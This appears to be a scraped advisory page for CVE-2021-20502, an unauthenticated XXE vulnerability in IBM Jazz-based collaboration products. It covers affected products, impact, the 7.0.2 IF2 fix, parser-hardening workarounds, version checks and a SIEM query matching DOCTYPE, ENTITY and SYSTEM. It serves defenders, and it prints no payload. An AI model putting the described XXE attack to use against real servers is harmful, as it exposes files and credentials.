CVE-2021-20502
📋 TL;DR
This XXE vulnerability in IBM Jazz Foundation Products allows attackers to read sensitive files from the server or cause denial of service through memory exhaustion. It affects organizations using vulnerable versions of IBM's Jazz-based collaboration platforms. The attack can be performed remotely without authentication.
💻 Affected Systems
- IBM Jazz Foundation Products
- IBM Engineering Lifecycle Management
- IBM Rational Collaborative Lifecycle Management
- IBM Rational DOORS Next
- IBM Rational Engineering Lifecycle Manager
- IBM Rational Team Concert
- IBM Rational Quality Manager
📦 What is this software?
Engineering Requirements Quality Assistant On Premises by Ibm
View all CVEs affecting Engineering Requirements Quality Assistant On Premises →
Rational Engineering Lifecycle Manager by Ibm
View all CVEs affecting Rational Engineering Lifecycle Manager →
Rational Engineering Lifecycle Manager by Ibm
View all CVEs affecting Rational Engineering Lifecycle Manager →
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise through sensitive file disclosure (including configuration files, credentials), potential remote code execution, or complete service disruption through memory exhaustion.
Likely Case
Information disclosure of server files, potentially exposing configuration data, credentials, or other sensitive information stored on the affected system.
If Mitigated
Limited impact with proper network segmentation and XML parsing restrictions, potentially only causing minor service disruption.
🎯 Exploit Status
XXE vulnerabilities are well-understood and typically easy to exploit with standard XXE payloads. No authentication required for exploitation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 7.0.2 IF2 and later
Vendor Advisory: https://www.ibm.com/support/pages/node/6437579
Restart Required: Yes
Instructions:
1. Download the interim fix from IBM Fix Central. 2. Stop the Jazz application server. 3. Apply the fix according to IBM's installation instructions. 4. Restart the application server. 5. Verify the fix is applied correctly.
🔧 Temporary Workarounds
Disable XML External Entity Processing
allConfigure XML parsers to disable external entity resolution
Configure FEATURE_SECURE_PROCESSING=true in XML parsers
Set javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING to true
Input Validation and Filtering
allImplement strict input validation to reject XML containing external entity declarations
Implement XML schema validation
Use whitelisting for allowed XML elements
🧯 If You Can't Patch
- Implement network segmentation to restrict access to vulnerable systems
- Deploy a web application firewall (WAF) with XXE protection rules
🔍 How to Verify
Check if Vulnerable:
Check the installed version of IBM Jazz products. If version is between 6.0.6 and 7.0.2 (excluding 7.0.2 IF2), the system is vulnerable.Check Version:
Check the Jazz application's About page or version.txt file in the installation directoryVerify Fix Applied:
Verify that the installed version is 7.0.2 IF2 or later, or test with a safe XXE payload to confirm it's no longer processed.📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors
- Multiple large XML file uploads
- Requests with XML containing DOCTYPE declarations
- Outbound connections to unusual external URLs from XML parser
Network Indicators:
- HTTP requests containing XML with external entity references
- Unusual outbound traffic patterns from the Jazz server
SIEM Query:
source="jazz_logs" AND ("DOCTYPE" OR "ENTITY" OR "SYSTEM") AND NOT "expected_xml_pattern"